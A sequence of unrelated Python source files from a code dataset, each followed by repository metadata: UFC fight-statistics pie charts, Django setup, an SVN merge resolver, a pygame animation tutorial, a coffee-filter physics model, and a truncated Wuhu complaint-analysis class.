    colors = ['lightsteelblue', 'yellowgreen', 'plum', 'lightcoral']
    for position, title, sizes in ((221, left_title, left_sizes),
                                   (222, right_title, right_sizes)):
        plt.subplot(position)
        plt.title(title)
        plt.pie(sizes, explode=(0, 0, 0, 0), labels=labels, colors=colors,
                autopct='%1.1f%%', shadow=True, startangle=140)
        plt.axis('equal')
    plt.figure(1)
    plt.show()  # fixed: original had `plt.show` (no call) after every figure


# # Comparing Total vs Result
#
# This section compares the predicted breakdown (career totals) against the
# actual UFC 236 results, one figure per fighter.
#
# Titles are normalised to '<name> Total' / '<name> Results'.  The original
# had several copy/paste typos: 'kelvin', 'Kevin Gastelum', panels missing
# their 'Total'/'Results' suffix, and the Krylov Total panel mislabelled
# 'Results'.
# In[40]-In[49]:
_comparisons = [
    ('Max Holloway',
     [HClinch, HDistance, HGround, HNormal],
     [Results_HClinch, Results_HDistance, Results_HGround, Results_HNormal]),
    ('Dustin Poirier',
     [PClinch, PDistance, PGround, PNormal],
     [Results_PClinch, Results_PDistance, Results_PGround, Results_PNormal]),
    ('Kelvin Gastelum',
     [GClinch, GDistance, GGround, GNormal],
     [Results_GClinch, Results_GDistance, Results_GGround, Results_GNormal]),
    ('Israel Adesanya',
     [AClinch, ADistance, AGround, ANormal],
     [Results_AClinch, Results_ADistance, Results_AGround, Results_ANormal]),
    ('Eryk Anders',
     [AnClinch, AnDistance, AnGround, AnNormal],
     [Results_AnClinch, Results_AnDistance, Results_AnGround, Results_AnNormal]),
    ('Khalil Rountree Jr.',
     [RClinch, RDistance, RGround, RNormal],
     [Results_RClinch, Results_RDistance, Results_RGround, Results_RNormal]),
    ('Alan Jouban',
     [JClinch, JDistance, JGround, JNormal],
     [Results_JClinch, Results_JDistance, Results_JGround, Results_JNormal]),
    ('Dwight Grant',
     [GrClinch, GrDistance, GrGround, GrNormal],
     [Results_GrClinch, Results_GrDistance, Results_GrGround, Results_GrNormal]),
    ('Ovince Saint Preux',
     [PrClinch, PrDistance, PrGround, PrNormal],
     [Results_PrClinch, Results_PrDistance, Results_PrGround, Results_PrNormal]),
    ('Nikita Krylov',
     [KClinch, KDistance, KGround, KNormal],
     [Results_KClinch, Results_KDistance, Results_KGround, Results_KNormal]),
]
for fighter_name, total_sizes, result_sizes in _comparisons:
    _pie_pair(fighter_name + ' Total', total_sizes,
              fighter_name + ' Results', result_sizes)
# In[ ]:
| [
"noreply@github.com"
] | noreply@github.com |
d51f21fe04ab46c872361e77f688ddde25e6690d | 1ba68429cd4a1654a66dd7b0a7b8e91f81798073 | /cart/admin.py | 25928702bc82acc30d13248cd482e57f5dc03454 | [] | no_license | crowdbotics-apps/test-002-31939 | 097234cc8a8870e39ece59640ad66a14c641b708 | d669523f2ed3681d487d4a1a65645a642c6413c1 | refs/heads/master | 2023-08-29T21:34:54.106718 | 2021-11-12T17:25:07 | 2021-11-12T17:25:07 | 427,392,814 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 159 | py | from django.contrib import admin
from .models import Content, Product

# Expose the app's Product and Content models in the Django admin interface.
admin.site.register(Product)
admin.site.register(Content)
# Register your models here.
| [
"team@crowdbotics.com"
] | team@crowdbotics.com |
07554bbecc8d641e211391fd30c019faa434d82f | 64e2a21f9917e3c10116d4cc9981c14851fff779 | /chapter_11_pygame_basic2/5.1.5 pygame13.py | 38cbd210a9462b59bbff1b1c0c371bf05a2a0374 | [] | no_license | Tanapoowapat/python_class_2021 | d1824f894583f4da804fd24a798c6566706185bc | 8f5329e990b45f8dbb772101ac91082542a4d2f2 | refs/heads/master | 2023-09-03T01:42:04.042721 | 2021-11-04T10:38:53 | 2021-11-04T10:38:53 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,209 | py | # สร้างศัตรู
import pygame
# load image
walkRight = [pygame.image.load('image/R1.png'), pygame.image.load('image/R2.png'),
pygame.image.load('image/R3.png'), pygame.image.load('image/R4.png'),
pygame.image.load('image/R5.png'), pygame.image.load('image/R6.png'),
pygame.image.load('image/R7.png'), pygame.image.load('image/R8.png'),
pygame.image.load('image/R9.png')]
walkLeft = [pygame.image.load('image/L1.png'), pygame.image.load('image/L2.png'),
pygame.image.load('image/L3.png'), pygame.image.load('image/L4.png'),
pygame.image.load('image/L5.png'), pygame.image.load('image/L6.png'),
pygame.image.load('image/L7.png'), pygame.image.load('image/L8.png'),
pygame.image.load('image/L9.png')]
background = pygame.image.load('image/bg.jpg')
character = pygame.image.load('image/standing.png')
screen = pygame.display.set_mode((500, 500))
pygame.display.set_caption("Character Animation")
clock = pygame.time.Clock()
class Player(object):
def __init__(self, x, y, width, height):
self.x = x
self.y = y
self.width = width
self.height = height
self.velocity = 5
self.isJump = False
self.left = False
self.right = False
self.walkCount = 0
self.jumpCount = 10
def draw(self, win):
if self.walkCount + 1 >= 27:
self.walkCount = 0
if self.left:
win.blit(walkLeft[self.walkCount // 3], (self.x, self.y))
self.walkCount += 1
elif self.right:
win.blit(walkRight[self.walkCount // 3], (self.x, self.y))
self.walkCount += 1
else:
win.blit(character, (self.x, self.y))
class Fire(object):
def __init__(self, x, y, radius, color, facing):
self.x = x
self.y = y
self.radius = radius
self.color = color
self.facing = facing
self.velocity = 8 * facing
def draw(self, win):
pygame.draw.circle(win, self.color, (self.x, self.y), self.radius)
class Enemy(object):
walkRight = [pygame.image.load('image/R1E.png'), pygame.image.load('image/R2E.png'),
pygame.image.load('image/R3E.png'), pygame.image.load('image/R4E.png'),
pygame.image.load('image/R5E.png'), pygame.image.load('image/R6E.png'),
pygame.image.load('image/R7E.png'), pygame.image.load('image/R8E.png'),
pygame.image.load('image/R9E.png'), pygame.image.load('image/R10E.png'),
pygame.image.load('image/R11E.png')]
walkLeft = [pygame.image.load('image/L1E.png'), pygame.image.load('image/L2E.png'),
pygame.image.load('image/L3E.png'), pygame.image.load('image/L4E.png'),
pygame.image.load('image/L5E.png'), pygame.image.load('image/L6E.png'),
pygame.image.load('image/L7E.png'), pygame.image.load('image/L8E.png'),
pygame.image.load('image/L9E.png'), pygame.image.load('image/L10E.png'),
pygame.image.load('image/L11E.png')]
def __init__(self, x, y, width, height, end):
self.x = x
self.y = y
self.width = width
self.height = height
self.path = [x, end]
self.walkCount = 0
self.vel = 3
def draw(self, win):
self.move()
if self.walkCount + 1 >= 33:
self.walkCount = 0
if self.vel > 0:
win.blit(self.walkRight[self.walkCount // 3], (self.x, self.y))
self.walkCount += 1
else:
win.blit(self.walkLeft[self.walkCount // 3], (self.x, self.y))
self.walkCount += 1
def move(self):
if self.vel > 0:
if self.x < self.path[1] + self.vel:
self.x += self.vel
else:
self.vel = self.vel * -1
self.x += self.vel
self.walkCount = 0
else:
if self.x > self.path[0] - self.vel:
self.x += self.vel
else:
self.vel = self.vel * -1
self.x += self.vel
self.walkCount = 0
def redrawGameWindow():
screen.blit(background, (0, 0))
man.draw(screen)
goblin.draw(screen)
for bullet in bullets:
bullet.draw(screen)
pygame.display.update()
# mainloop
man = Player(200, 410, 64, 64)
goblin = Enemy(100, 410, 64, 64, 300)
bullets = []
run = True
while run:
clock.tick(27)
for event in pygame.event.get():
if event.type == pygame.QUIT:
run = False
for bullet in bullets:
if 500 > bullet.x > 0:
bullet.x += bullet.velocity
else:
bullets.pop(bullets.index(bullet))
keys = pygame.key.get_pressed()
if keys[pygame.K_SPACE]:
if man.left:
facing = -1
else:
facing = 1
if len(bullets) < 5:
bullets.append(
Fire(round(man.x + man.width // 2), round(man.y + man.height // 2), 6, (0, 0, 0), facing))
if keys[pygame.K_LEFT] and man.x > man.velocity:
man.x -= man.velocity
man.left = True
man.right = False
man.standing = False
elif keys[pygame.K_RIGHT] and man.x < 500 - man.width - man.velocity:
man.x += man.velocity
man.right = True
man.left = False
man.standing = False
else:
man.standing = True
man.walkCount = 0
if not man.isJump:
if keys[pygame.K_UP]:
man.isJump = True
man.right = False
man.left = False
man.walkCount = 0
else:
if man.jumpCount >= -10:
neg = 1
if man.jumpCount < 0:
neg = -1
man.y -= (man.jumpCount ** 2) * 0.5 * neg
man.jumpCount -= 1
else:
man.isJump = False
man.jumpCount = 10
redrawGameWindow()
pygame.quit()
| [
"noreply@github.com"
] | noreply@github.com |
0ce9ad4435b871c6acb541ca7133671bebb572ad | 085edd7c155d9589cb8826337eeec77e9c479de4 | /tests/test_app/tests/custom_storage_class_tests.py | d01b0def08ec8a95898045df97ac31149c02d55c | [
"MIT",
"Apache-2.0"
] | permissive | linnify/django-minio-storage | 38733ba1952cea7bc13f6290b7e32359243d8460 | 7feec659056d29d241fc70845e1c0f459c7ec730 | refs/heads/master | 2022-12-29T02:27:23.750093 | 2020-10-12T15:56:51 | 2020-10-12T15:56:51 | 302,329,776 | 0 | 0 | NOASSERTION | 2020-10-12T15:56:52 | 2020-10-08T12:15:54 | Python | UTF-8 | Python | false | false | 4,501 | py | import io
import os
import shutil
import tempfile
from django.core.files.base import ContentFile
from django.test import TestCase, override_settings
from django.utils.deconstruct import deconstructible
from minio_storage.files import ReadOnlyMinioObjectFile
from minio_storage.storage import (
MinioStorage,
create_minio_client_from_settings,
get_setting,
)
from .utils import BaseTestMixin
from .utils import bucket_name as create_test_bucket_name
@deconstructible
class SecretStorage(MinioStorage):
"""The SecretStorage MinioStorage subclass can be used directly, as a storage in
settings.DEFAULT_FILE_STORAGE or after instantiated used individually on any django
FileField:
from django.db import models
ss = SecretStorage(bucket_name='invoices')
class Invoice(models.Model):
...
pdf = models.FileField(storage=ss)
"""
# We can set a new default File class implementation that will be used here because
# we want to stream the data directly from minio. Imagine that we need to process
# large files where we don't want to waste time/ram/disk space on writing the file
# to disk two times before processing it.
#
file_class = ReadOnlyMinioObjectFile
def __init__(self, bucket_name=None):
# we can create the minio client ourselves or use
# create_minio_client_from_settings convinience function while providing it with
# extra args.
#
client = create_minio_client_from_settings(minio_kwargs={"region": "us-east-1"})
# or use our own Django setting
#
if bucket_name is None:
bucket_name = get_setting("SECRET_BUCKET_NAME")
# Run the super constructor and make a choice to only use presigned urls with
# this bucket so that we can keep files more private here than how media files
# usually are public readable.
#
super().__init__(
client,
bucket_name,
auto_create_bucket=True,
auto_create_policy=False,
presign_urls=True,
)
class CustomStorageTests(BaseTestMixin, TestCase):
@override_settings(SECRET_BUCKET_NAME=create_test_bucket_name("my-secret-bucket"))
def test_custom_storage(self):
# Instansiate a storage class and put a file in it so that we have something to
# work with.
#
storage = SecretStorage()
storage_filename = storage.save("secret.txt", ContentFile(b"abcd"))
# Create a temporary workspace directory.
#
# It's importat that this directory is deleted after we are done so we use the
# with statement here.
#
with tempfile.TemporaryDirectory() as workspace:
# A filename to use for the file inside the working directory.
#
filename = os.path.join(workspace, "secret.txt")
# Open a stream with the minio file objenct and the temporary file.
#
# We might be processing a lot of files in a loop here so we are going top
# use the with statement to ensure that both the input stream and output
# files are closed after the copying is done.
#
with open(filename, "wb") as out_file, storage.open(
storage_filename
) as storage_file:
# Copy the stream from the http stream to the out_file
#
shutil.copyfileobj(storage_file.file, out_file)
#
# We are not using the ReadOnlyMinioObjectFile type so we can't seek in
# it.
#
with self.assertRaises(io.UnsupportedOperation):
storage_file.file.seek()
workspace_files = os.listdir(workspace)
print(workspace_files) # prints: ['secret.txt']
#
# Process the file with external tools or something....
#
# For the purpouse of the example test we just check that the contents of
# the file is what we wrote in the beginning of the test.
#
with open(filename, "rb") as f:
self.assertEqual(f.read(), b"abcd")
#
# Clean up after the test
#
storage.delete(storage_filename)
#
# use the minio client directly to also remove bucket
#
storage.client.remove_bucket(storage.bucket_name)
| [
"thomasf@jossystem.se"
] | thomasf@jossystem.se |
84c5f3d320a54b13eb6d71849aec3df781eeb2e4 | f4a7c278c7beb7b574e524fe0c84e3fa9712c61a | /project/urls.py | 32e6df7f9d437c9b3c890068421a696a4fbff024 | [] | no_license | kottenator/sample-django-project | 2580b33fc622db1795589d3e7c392333f6a00229 | 87531b1f9dbd02542d03e4179b82a719b10b3fe7 | refs/heads/master | 2021-01-01T04:25:22.058568 | 2016-06-01T02:42:10 | 2016-06-01T02:42:10 | 59,070,746 | 1 | 1 | null | 2016-05-18T17:10:21 | 2016-05-18T01:12:22 | JavaScript | UTF-8 | Python | false | false | 197 | py | from django.conf.urls import url, include
import project.base.urls
import project.main.urls
urlpatterns = [
url(r'', include(project.base.urls)),
url(r'', include(project.main.urls)),
]
| [
"kottenator@gmail.com"
] | kottenator@gmail.com |
0f3d50f5b5f2ecc78827b40568849200168ca2ee | 64efd3a252c09ac93467f8e1ca48cf0b08986294 | /python/svn_nasty_merge/svn_nasty_merge.py | ef48321ff9cc2a81772a577f79e19482de0f1bc7 | [] | no_license | raphaelchampeimont/almacha | a86ff10cf05d676a5c110fd21e35de1b4b9a838f | 439684932b54bd9214e4119b4f77c035f24a7ad8 | refs/heads/master | 2021-05-31T08:00:30.750759 | 2016-05-03T15:58:55 | 2016-05-03T15:58:55 | 12,587,906 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 432 | py | #!/usr/bin/python
# -*- coding: utf-8 -*-
import sys
import os
# Usage: svn_nasty_merge.py <file-with-conflict-markers>
#
# Resolves an SVN merge conflict in place by keeping only the "mine" side:
# the <<<<<<< / ======= / >>>>>>> marker lines are dropped, and everything
# between ======= and >>>>>>> (the "theirs" side) is discarded.
fn = sys.argv[1]

kept = []           # lines that survive the resolution
discarding = False  # True while inside the "theirs" half of a conflict block
with open(fn) as f:  # with-statement guarantees the handle is closed
    for line in f:
        if line.startswith("<<<<<<<"):
            pass  # drop the opening marker itself
        elif line.startswith("======="):
            discarding = True
        elif line.startswith(">>>>>>>"):
            discarding = False  # closing marker: resume keeping lines
        elif not discarding:
            kept.append(line)

# Rewrite the file with the resolved content. join() is linear time,
# unlike the original's repeated string concatenation.
with open(fn, "w") as f:
    f.write("".join(kept))
| [
"almacha@almacha.org"
] | almacha@almacha.org |
4ca726894e8a47f19d38fc009e00fb4aaa6896df | bf4be1f469b049dccf41807514a168400e48cdd1 | /Related Topics/Bit Manipulation/201. Bitwise AND of Numbers Range.py | c38348cbfcb27e1311a88564532ee0347c21b603 | [] | no_license | billgoo/LeetCode_Solution | 8bde6844ecc44c61a914f9c88030d8d3e724c947 | 360d144cee86aae877b6187a07f1957e673c3592 | refs/heads/master | 2022-04-26T16:10:00.380910 | 2022-04-20T04:54:06 | 2022-04-20T04:54:06 | 155,243,219 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 436 | py | class Solution:
def rangeBitwiseAnd(self, m: int, n: int) -> int:
# bits shift
"""
e = 0
while m != n:
m >>= 1
n >>= 1
e += 1
return m << e
"""
# Brian Kernighan's Algorithm
# n & (n - 1) will remove the right most bits: 1100 & 1011 = 1000
while m < n:
n &= (n - 1)
return m & n | [
"billgoo0813@gmail.com"
] | billgoo0813@gmail.com |
f4031c57f227ca1463ac3b60e3daa48a7ec245d7 | 45598fdebc665e80d6c8ec53e5208415b8f7dcb2 | /coffee-filter.py | 416c18100c994b56016bd77b8bede8a55b31223d | [
"Apache-2.0"
] | permissive | huginn-sim/coffee-filter2 | 3e9c449f34957c767b5b2e028f402de8d6b7ad70 | ee1351695b7f6c60b7d09c51ff82af91ab9543f9 | refs/heads/master | 2020-05-28T13:28:56.235226 | 2014-02-16T02:29:57 | 2014-02-16T02:29:57 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,458 | py | # -*- coding: utf-8 -*-
"""
.. module:: coffee-filter
:synopsis: Models the position, velocity, and acceleration of a falling coffee filter.
.. moduleauthor:: Huginn
"""
#~ Modules
from pylab import *
import sys
#/~ Modules
#~ Custom Modules
sys.path.append("C:\Users\Evin\Documents\Github")
from viz.display.plot import configure
#/~ Custom Modules
#~ ODE Solvers
def euler(f,t,dt,x):
    """One explicit (forward) Euler step: x_{n+1} = x_n + f(t_n, x_n) * dt."""
    slope = f(t, x)
    return x + slope*dt
def euler_richardson(f,t,dt,x):
    """One Euler-Richardson (midpoint) step: take a half Euler step to the
    interval midpoint, then advance the full step with the midpoint slope."""
    half = dt/2.
    x_mid = x + f(t, x)*half
    return x + f(t + half, x_mid)*dt
def rk4(f,t,dt,x):
    """One classical fourth-order Runge-Kutta step.

    Samples the slope at the interval start, twice at the midpoint and
    once at the end, then combines them with 1-2-2-1 weighting.
    """
    half = dt/2.
    s1 = f(t       , x          )*dt
    s2 = f(t + half, x + s1/2.  )*dt
    s3 = f(t + half, x + s2/2.  )*dt
    s4 = f(t + dt  , x + s3     )*dt
    return x + (1./6.)*(s1 + 2*s2 + 2*s3 + s4)
def predict_correct(f,t,dt,x):
    """Integrate dx/dt = f(t, x) with a leapfrog predictor and a
    trapezoidal corrector, seeded by one backward RK4 step.

    :param f: derivative function f(t, x).
    :param t: sequence of times to step through (left unmodified).
    :param dt: time step.
    :param x: sequence whose first element is the initial state.
    :returns: (times, states) where states holds the backward seed state,
              the initial state, then one corrected state per time in t.
    """
    steps = list(t)  # BUGFIX: work on a copy instead of mutating the caller's list
    # Seed the two-step scheme with a state one step *before* steps[0].
    # BUGFIX: the backward step starts from time steps[0]; the original
    # passed steps[0] - dt, which is wrong for time-dependent f.
    pc_state = [rk4(f, steps[0], -dt, x[0])]
    pc_state.append(x[0])
    # Roll forward. BUGFIX: iterate over the 't' argument rather than the
    # module-level 'times' global that the original accidentally used.
    for tn in steps:
        xp = pc_state[-2] + f(tn, pc_state[-1])*2*dt                   # predictor (leapfrog)
        xc = pc_state[-1] + 0.5*(f(tn, xp) + f(tn, pc_state[-1]))*dt   # corrector (trapezoid)
        pc_state.append(xc)
    return steps, array(pc_state)
#/~ ODE Solvers
def finite_diff(times,x):
    """Central finite differences for velocity and acceleration.

    For every interior sample i (with dt_i = (times[i+1] - times[i-1]) / 2):
        v_i = (x[i+1] - x[i-1]) / (2 dt_i)
        a_i = (x[i+1] - 2 x[i] + x[i-1]) / dt_i**2
    Returns (v, a, dts) as arrays of length len(times) - 2.
    """
    v = []
    a = []
    dts = []
    for i in range(1, len(times) - 1):
        step = (times[i + 1] - times[i - 1]) / 2.
        dts.append(step)
        v.append((x[i + 1] - x[i - 1]) / (2. * step))
        a.append((x[i + 1] - 2 * x[i] + x[i - 1]) / step ** 2)
    return array(v), array(a), array(dts)
def sample_data(data=None):
    """ Returns sampled kinematics for the falling coffee filter.

    Derives velocity and acceleration from (time, position) samples using
    central finite differences (see finite_diff).

    :param data: 2xN array [times; positions]. If 'None' use the bundled
                 default measurements.
    :returns: (times, dts, pos, vel, acc)
    """
    # BUGFIX: use 'is None' — 'data == None' is broadcast elementwise for an
    # ndarray argument and raises an ambiguous-truth-value error.
    if data is None:  # Use default 'data' if none is provided by user.
        data = np.array([[ .2055,.2302,.2550,.2797,.3045,.3292,.3539,.3786,.4033,
                           .4280,.4526,.4773,.5020,.5266,.5513,.5759,.6005,.6252,
                           .6498,.6744,.6990,.7236,.7482,.7728,.7974,.8220,.8466],
                         [ .4188,.4164,.4128,.4082,.4026,.3958,.3878,.3802,.3708,
                           .3609,.3505,.3400,.3297,.3181,.3051,.2913,.2788,.2667,
                           .2497,.2337,.2175,.2008,.1846,.1696,.1566,.1393,.1263]])
    # print() calls behave identically under Python 2 and 3 for a single arg.
    times = data[0,:]; print(times)
    pos = data[1,:]; print(pos)
    vel, acc, dts = finite_diff(times,pos); print(vel); print(acc)
    return times, dts, pos, vel, acc
def plot_samples(times, pos, vel, acc):
    """Draw a 2x2 figure of the sampled data: position vs time,
    velocity vs time, acceleration vs time, and acceleration vs velocity.

    Green/red markers highlight the first/last sample of each series.
    Relies on the module-level 'configure' helper for axis styling.
    Note: vel and acc are finite-difference series, so they are two
    samples shorter than times (hence times[1:-1]).
    """
    fig, axes = subplots(2, 2)
    # Top-left: position vs time.
    ptmark, = axes[0,0].plot(times, pos, 'b--o')
    start_ptmark, = axes[0,0].plot(times[0], pos[0], 'go', ms=10)
    end_ptmark, = axes[0,0].plot(times[-1], pos[-1], 'ro', ms=10)
    axes[0,0].legend( [ptmark, start_ptmark, end_ptmark],
                        [r'$\left(t,p\right)$', r'First', r'Last'],
                        numpoints=1,
                        loc="upper right")
    configure( ax=axes[0,0],
                title="Position vs Time",
                xlabel=r"Time $\left(seconds\right)$",
                ylabel=r"Position $\left(meters\right)$",
                xbounds=None, ybounds=None)
    # Bottom-left: velocity vs time.
    vtmark, = axes[1,0].plot(times[1:-1], vel, 'b--o')
    start_vtmark, = axes[1,0].plot(times[1], vel[0], 'go', ms=10)
    end_vtmark, = axes[1,0].plot(times[-2], vel[-1], 'ro', ms=10)
    axes[1,0].legend( [vtmark, start_vtmark, end_vtmark],
                        [r'$\left(t,v\right)$', r'First', r'Last'],
                        numpoints=1,
                        loc="upper right")
    configure( ax=axes[1,0],
                title="Velocity vs Time",
                xlabel=r"Time $\left(seconds\right)$",
                ylabel=r"Velocity $\left(\frac{meters}{second}\right)$",
                xbounds=None, ybounds=None)
    # Top-right: acceleration vs time (clamped to +/- 10 m/s^2).
    atmark, = axes[0,1].plot(times[1:-1], acc, 'b--o')
    start_atmark, = axes[0,1].plot(times[1], acc[0], 'go', ms=10)
    end_atmark, = axes[0,1].plot(times[-2], acc[-1], 'ro', ms=10)
    axes[0,1].legend( [atmark, start_atmark, end_atmark],
                        [r'$\left(t,a\right)$', r'First', r'Last'],
                        numpoints=1,
                        loc="lower right")
    configure( ax=axes[0,1],
                title="Acceleration vs Time",
                xlabel=r"Time $\left(seconds\right)$",
                ylabel=r"Acceleration $\left(\frac{meters}{seconds^2}\right)$",
                xbounds=None, ybounds=(-10,10))
    # Bottom-right: acceleration vs velocity (phase-style plot).
    avmark, = axes[1,1].plot(vel, acc, 'b--o')
    start_avmark, = axes[1,1].plot(vel[0], acc[0], 'go', ms=10)
    end_avmark, = axes[1,1].plot(vel[-1], acc[-1], 'ro', ms=10)
    axes[1,1].legend( [avmark, start_avmark, end_avmark],
                        [r'$\left(v,a\right)$', r'First', r'Last'],
                        numpoints=1,
                        loc="lower right")
    configure( ax=axes[1,1],
                title="Acceleration vs Velocity",
                xlabel=r"Velocity $\left(\frac{meters}{second}\right)$",
                ylabel=r"Acceleration $\left(\frac{meters}{seconds^2}\right)$",
                xbounds=None, ybounds=(-10,10))
    fig.suptitle("Falling Coffee Filter", size=30)
    fig.subplots_adjust(left=0.05, right=0.95, top=0.9, bottom=0.08)
    show()
def plot_acc_vs_vel(vel,acc):
    """Draw a single acceleration-vs-velocity figure.

    Green/red markers highlight the first/last sample; the y-axis is
    clamped to +/- 10 m/s^2 via the module-level 'configure' helper.
    """
    fig, ax = plt.subplots()
    avmark, = ax.plot(vel, acc, 'b--o')
    start_avmark, = ax.plot(vel[0], acc[0], 'go', ms=10)
    end_avmark, = ax.plot(vel[-1], acc[-1], 'ro', ms=10)
    ax.legend( [avmark, start_avmark, end_avmark],
                [r'$\left(v,a\right)$', r'First', r'Last'],
                numpoints=1,
                loc="lower right")
    configure( ax=ax,
                title="Acceleration vs Velocity",
                xlabel=r"Velocity $\left(\frac{meters}{second}\right)$",
                ylabel=r"Acceleration $\left(\frac{meters}{seconds^2}\right)$",
                xbounds=None, ybounds=(-10,10))
    fig.suptitle("Falling Coffee Filter", size=30)
    fig.subplots_adjust(left=0.05, right=0.95, top=0.9, bottom=0.08)
    show()
def plot_samples_and_models(times, pos, vel, acc):
    """Overlay the measured samples with two drag-model integrations.

    F1 integrates the linear-drag model (falld1) and F2 the quadratic-drag
    model (falld2), both with RK4 from the first measured (pos, vel) state.
    Reads the module globals dts, vT, falld1 and falld2.

    NOTE(review): zip(...)[1:] relies on zip returning a list, i.e. this
    function only runs under Python 2 (consistent with the print
    statements elsewhere in this file).
    """
    F1 = [array([pos[0], vel[0]])]
    F2 = [array([pos[0], vel[0]])]
    # Step both models forward through the measured time base.
    for t,dt,p,v in zip(times,dts,pos,vel)[1:]:
        F1.append(rk4(falld1, t, dt, F1[-1]))
        F2.append(rk4(falld2, t, dt, F2[-1]))
    F1 = array(F1)
    F2 = array(F2)
    fig, axes = subplots(2)
    # Top: measured position vs both model positions.
    pmark, = axes[0].plot(times, pos, 'b--o')
    plmark, = axes[0].plot(times[:-2], F1[:,0], 'g--o')
    pqmark, = axes[0].plot(times[:-2], F2[:,0], 'r--o')
    axes[0].legend( [pmark, plmark, pqmark],
                    [r'$\left(t,p\right)$', r'Linear', r'Quadratic'],
                    numpoints=1,
                    loc="upper right")
    configure( ax=axes[0],
                title=r'Position vs Time $\left(v_t='+ str(vT)+ r'\right)$',
                xlabel=r"Time $\left(seconds\right)$",
                ylabel=r"Position $\left(meters\right)$",
                xbounds=None, ybounds=(0,.5))
    # Bottom: measured velocity vs both model velocities.
    vmark, = axes[1].plot(times[:-2], vel, 'b--o')
    vlmark, = axes[1].plot(times[:-2], F1[:,1], 'g--o')
    vqmark, = axes[1].plot(times[:-2], F2[:,1], 'r--o')
    axes[1].legend( [vmark, vlmark, vqmark],
                    [r'$\left(t,v\right)$', r'Linear', r'Quadratic'],
                    numpoints=1,
                    loc="upper right")
    configure( ax=axes[1],
                title=r'Velocity vs Time $\left(v_t='+str(vT)+r'\right)$',
                xlabel=r"Time $\left(seconds\right)$",
                ylabel=r"Velocity $\left(\frac{meters}{second}\right)$",
                xbounds=None, ybounds=None)
    fig.suptitle("Falling Coffee Filter", size=30)
    fig.subplots_adjust(left=0.05, right=0.95, top=0.9, bottom=0.08)
    show()
# Sliding (three-point) average used to smooth noisy sample series.
def slide_avg(x):
    """Return a length len(x)-2 array of centered three-point means."""
    triples = zip(x, x[1:], x[2:])
    return np.array([(a + b + c) / 3 for a, b, c in triples])
def falld1(t,x):
    """State derivative [v, a] for falling with drag *linear* in velocity:
    a = g * (1 - v / vT). Reads the module globals g and vT."""
    v = x[1]
    return np.array([v, g*(1 - v/vT)])
def falld2(t,x):
    """State derivative [v, a] for falling with drag *quadratic* in velocity:
    a = g * (1 - (v / vT)**2). Reads the module globals g and vT."""
    v = x[1]
    return np.array([v, g*(1 - (v/vT)**2)])
# this is when I was going to run rk with the two falling models
#~ Entry point of the script.
if __name__ == "__main__":
    #~ State Variables
    # Nominal integration window and step (placeholders: the measured time
    # base returned by sample_data() overwrites times/dts below).
    t0 = 0; tf = 10*pi; dt = .1
    times = np.arange(t0, tf, dt)
    g = -9.81  # gravitational acceleration (m/s^2); read by falld1/falld2
    # Initial position/velocity/acceleration; vT is the terminal velocity
    # (negative = downward) used by both drag models.
    x0 = 1.; v0 = 0.; vT = -0.425; a0 = g
    state = [np.array([x0,v0,a0])]
    #/~ State Variables

    # Load the measurements, then render all figures.
    times, dts, pos, vel, acc = sample_data()
    plot_samples(times, pos, vel, acc)
    plot_acc_vs_vel(vel,acc)
    plot_samples_and_models(times, pos, vel, acc)
| [
"evin.ozer@gmail.com"
] | evin.ozer@gmail.com |
f8bb9eb246710b9e106b9b5b027bcb279219dca4 | 2f6e1387b29879e24ea18ca7a1c293ddaf90297d | /yuqingzhuizong.py | 72dda4d33a4fee6cb0beb0d7943508ea2fd2e7d3 | [] | no_license | Ashley1207/wuhu_system | c4e19e14b91678e8272376daa1d28d460d749047 | e9fe85184c4a4ac6faa19a1db57b8b9a9e2ea9cc | refs/heads/master | 2023-04-21T09:38:40.671417 | 2021-05-08T22:19:37 | 2021-05-08T22:19:37 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 11,793 | py | import threading
import pymysql
import json
import pandas as pd
from gensim import corpora, models
import jieba
class Picture:
    """Builds chart-ready summaries (ECharts-style dicts) for complaint
    records matching a keyword in the local 'wuhu' MySQL database.

    Matching rows from the bottom_car and shizhang tables are loaded once
    in __init__; each method derives one visualization payload.
    """

    def __init__(self, keyword):
        self.conn = pymysql.connect(host="localhost", port=3306, user="root",
                                    password="123456", database="wuhu", charset="utf8")
        conn = pymysql.connect(host="localhost", port=3306, user="root",
                               password="123456", database="wuhu", charset="utf8")
        # SECURITY FIX: bind the keyword as a query parameter instead of
        # interpolating it into the SQL text (prevents SQL injection).
        sql = 'select * from bottom_car where message like %s'
        sql1 = 'select * from shizhang where message like %s'
        pattern = f"%{keyword}%"
        df = pd.read_sql(sql, conn, params=(pattern,))
        df1 = pd.read_sql(sql1, conn, params=(pattern,))
        df = pd.concat([df, df1], axis=0)
        self.number = len(df)  # total number of matching records
        data = df.sort_values(by="year_day", ascending=False)
        if len(data) != 0:
            # NOTE(review): self.data stays unset when nothing matched;
            # callers must check self.number before using the chart methods.
            self.data = data

    # Chart data #1: first/last occurrence info plus problem-type stats.
    def time_area(self):
        """Build the "brief analysis" payload: first/last occurrence, the
        outbreak month, report-type counts and several chart series."""
        # District/county names used to locate an event inside the message text.
        qu_xian = ["鸠江", "镜湖", "弋江", "繁昌", "湾沚", "南陵", "无为", "芜湖县", "三山"]
        data = self.data[["year_day", "receiveunitname", "message", "problem_type"]]
        first_time = data["year_day"].tolist()[-1]  # time of the first occurrence
        last_time = data["year_day"].tolist()[0]  # time of the latest occurrence
        first_area = [i for i in qu_xian if i in data.message.tolist()[-1]]  # district of the first occurrence
        if len(first_area) != 0:
            first_area = first_area[0]
        last_area = [i for i in qu_xian if i in data.message.tolist()[0]]  # district of the latest occurrence
        if len(last_area) != 0:
            last_area = last_area[0]
        # Fall back to the receiving unit (or scan every message) when no
        # district name appeared in the message itself.
        if not first_area:
            first_area = data.receiveunitname.tolist()[-1]
            if first_area == "暂无接收单位":
                first_area = "未知"
            elif len(first_area) > 6:
                for i in range(len(data.message.tolist())):
                    for a in qu_xian:
                        if a in data.message.tolist()[i]:
                            first_area = a
                            break
                    else:
                        continue
                    break
        if not last_area:
            last_area = data.receiveunitname.tolist()[0]
            if last_area == "暂无接收单位":
                last_area = "未知"
            elif len(last_area) > 6:
                for i in range(len(data.message.tolist())):
                    for a in qu_xian:
